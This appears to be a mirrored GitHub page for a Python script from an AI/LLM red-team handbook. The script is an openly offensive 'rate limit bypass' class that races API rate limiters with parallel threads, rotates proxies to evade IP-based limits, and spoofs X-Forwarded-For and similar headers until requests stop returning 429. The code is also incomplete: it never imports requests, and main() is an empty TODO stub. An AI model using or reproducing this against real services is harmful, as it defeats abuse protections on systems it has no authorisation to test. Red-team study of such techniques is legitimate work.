mirror of
https://github.com/Shiva108/ai-llm-red-team-handbook.git
synced 2026-02-12 22:52:48 +00:00
b3d3bac51f
- Extracted all code examples from handbook chapters - Organized into 15 attack categories - Created shared utilities (api_client, validators, logging, constants) - Added workflow orchestration scripts - Implemented install.sh for easy setup - Renamed all scripts to descriptive functional names - Added comprehensive README and documentation - Included pytest test suite and configuration
75 lines
2.0 KiB
Python
75 lines
2.0 KiB
Python
#!/usr/bin/env python3
|
|
"""
|
|
Rate limit bypass
|
|
|
|
Source: Chapter_17_04_API_Exploitation_and_Function_Calling
|
|
Category: plugin_exploitation
|
|
"""
|
|
|
|
import time
|
|
import threading
|
|
|
|
import argparse
|
|
import sys
|
|
|
|
class RateLimitBypass:
|
|
"""Bypass rate limits using various techniques"""
|
|
|
|
def parallel_requests(self, url, num_requests):
|
|
"""Send requests in parallel to race the limiter"""
|
|
threads = []
|
|
results = []
|
|
|
|
def make_request():
|
|
response = requests.get(url)
|
|
results.append(response.status_code)
|
|
|
|
# Launch all requests simultaneously
|
|
for _ in range(num_requests):
|
|
thread = threading.Thread(target=make_request)
|
|
threads.append(thread)
|
|
thread.start()
|
|
|
|
for thread in threads:
|
|
thread.join()
|
|
|
|
return results
|
|
|
|
def distributed_bypass(self, url, proxies):
|
|
"""Use multiple IPs to bypass IP-based rate limiting"""
|
|
results = []
|
|
|
|
for proxy in proxies:
|
|
response = requests.get(url, proxies={'http': proxy})
|
|
results.append(response.status_code)
|
|
|
|
return results
|
|
|
|
def header_manipulation(self, url):
|
|
"""Try different headers to bypass rate limits"""
|
|
headers_to_try = [
|
|
{'X-Forwarded-For': '192.168.1.1'},
|
|
{'X-Originating-IP': '192.168.1.1'},
|
|
{'X-Remote-IP': '192.168.1.1'},
|
|
{'X-Client-IP': '192.168.1.1'}
|
|
]
|
|
|
|
for headers in headers_to_try:
|
|
response = requests.get(url, headers=headers)
|
|
if response.status_code != 429: # Not rate limited
|
|
return headers # Found bypass
|
|
|
|
return None
|
|
|
|
|
|
def main():
|
|
"""Command-line interface."""
|
|
parser = argparse.ArgumentParser(description=__doc__)
|
|
parser.add_argument("--verbose", "-v", action="store_true", help="Verbose output")
|
|
args = parser.parse_args()
|
|
|
|
# TODO: Add main execution logic
|
|
pass
|
|
|
|
if __name__ == "__main__":
|
|
main() |